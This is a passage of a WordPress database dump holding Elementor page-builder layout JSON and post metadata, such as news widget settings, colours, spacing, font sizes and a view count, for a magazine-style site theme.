ve\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"9z1mjq9\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"5\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[],\"isInner\":true},{\"id\":\"7lys9fz\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[],\"isInner\":true}],\"isInner\":true}],\"isInner\":false},{\"id\":\"4b0mlug\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":\"34.995\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"nk9gr2t\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"section_sticky_element\":\"\",\"sticky_element\":\"sticky-yes\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"lpp590q\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(1101,408,'_elementor_version','0.4'),(1102,408,'_elementor_css','a:3:{s:4:\"time\";i:1508851546;s:5:\"fonts\";a:0:{}s:6:\"status\";s:4:\"file\";}'),(1104,405,'post_views_count','561'),(1106,409,'_elementor_edit_mode','builder'),(1107,409,'_elementor_data','[{\"id\":\"cgfdli8\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"content_width\":{\"unit\":\"px\",\"size\":\"1170\"},\"gap\":\"no\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"90zub0t\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"9wd6jr7\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"30\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"so55224\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.961\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"gvq9sbs\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"3\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#4caf50\",\"category_bg_hover_color\":\"#4caf50\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"dghaq27\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"offset\":\"1\",\"category\":[\"5\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"56\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#266cc9\",\"category_bg_hover_color\":\"#266cc9\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"6uc2i0p\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"44.078\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"fb4g874\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"3\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"78.5\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"400\",\"height\":\"510\",\"category_bg_color\":\"#c9975f\",\"category_bg_hover_color\":\"#c9975f\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"48mal4x\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.960\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"x20xpc5\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"5\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#ea7441\",\"category_bg_hover_color\":\"#ea7441\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"y4m8rgg\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"6\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#e5e100\",\"category_bg_hover_color\":\"#e5e100\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_color1\":\"rgba(255,255,255,0.5)\",\"post_icon_color2\":\"rgba(255,255,255,0.5)\",\"post_icon_size\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"pzcs9rp\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"content_width\":{\"unit\":\"px\",\"size\":\"1170\"},\"gap\":\"no\",\"structure\":\"20\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":0,\"bottom\":\"50\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"gifizg0\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":\"65.004\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"in485g7\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"20\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"sqh26zs\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":\"48.082\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"ni7iq5b\",\"elType\":\"widget\",\"settings\":{\"section_magzma_post_list\":\"\",\"posts_per_page\":\"1\",\"category\":[\"8\"],\"loop_infinite_class\":\"loop-infinte-list-1\",\"section_magzma_post_list_1_typhography_title\":\"\",\"post_icon_size_post_list_1_tablet\":{\"unit\":\"px\",\"size\":18},\"post_icon_size_post_list_1_mobile\":{\"unit\":\"px\",\"size\":18},\"post_icon_padding_post_list_1_tablet\":{\"unit\":\"px\",\"size\":10},\"post_icon_padding_post_list_1_mobile\":{\"unit\":\"px\",\"size\":10},\"post_list_1_view_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_weight_tablet\":\"600\",\"post_list_1_view_font_weight_mobile\":\"600\",\"typhography_category_post_list_1_background_color\":\"#385c7b\",\"post_list1_category_background_hov_color\":\"#385c7b\",\"post_list_1_category_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_font_size_tablet\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_size_mobile\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_weight_tablet\":\"600\",\"post_list_1_category_font_weight_mobile\":\"600\",\"typhography_title_post_list_1_hov_color\":\"#aaaaaa\",\"post_list_1_title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_font_size\":{\"unit\":\"px\",\"size\":\"24\"},\"post_list_1_title_font_size_tablet\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_size_mobile\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_weight_tablet\":\"600\",\"post_list_1_title_font_weight_mobile\":\"600\",\"post_list1_meta_title_hov_color\":\"#aaaaaa\",\"post_list_1_meta_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_weight_tablet\":\"600\",\"post_list_1_meta_font_weight_mobile\":\"600\",\"post_list_1_excerpt_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_word\":\"10\",\"use_read_more_post_list_1\":\"\",\"post_list1_read_more_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_weight_tablet\":\"400\",\"post_list1_read_more_font_weight_mobile\":\"400\",\"section_magzma_post_list_1_column_control\":\"\",\"horizontal_use\":\"left\",\"width\":\"600\",\"height\":\"395\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_list_style_1_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_list_style_1_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_post_list_animation_control\":\"\",\"animate\":\"fadeIn\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-post-list-1\"}],\"isInner\":true},{\"id\":\"feegelf\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":\"51.918\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[],\"isInner\":true}],\"isInner\":true},{\"id\":\"wnhjaaz\",\"elType\":\"widget\",\"settings\":{\"section_magzma_post_list\":\"\",\"posts_per_page\":\"4\",\"category\":[\"10\"],\"loop_infinite_class\":\"loop-infinte-list-1\",\"section_magzma_post_list_1_typhography_title\":\"\",\"post_icon_color1_post_list_1\":\"rgba(0,0,0,0.5)\",\"post_icon_color2_post_list_1\":\"rgba(0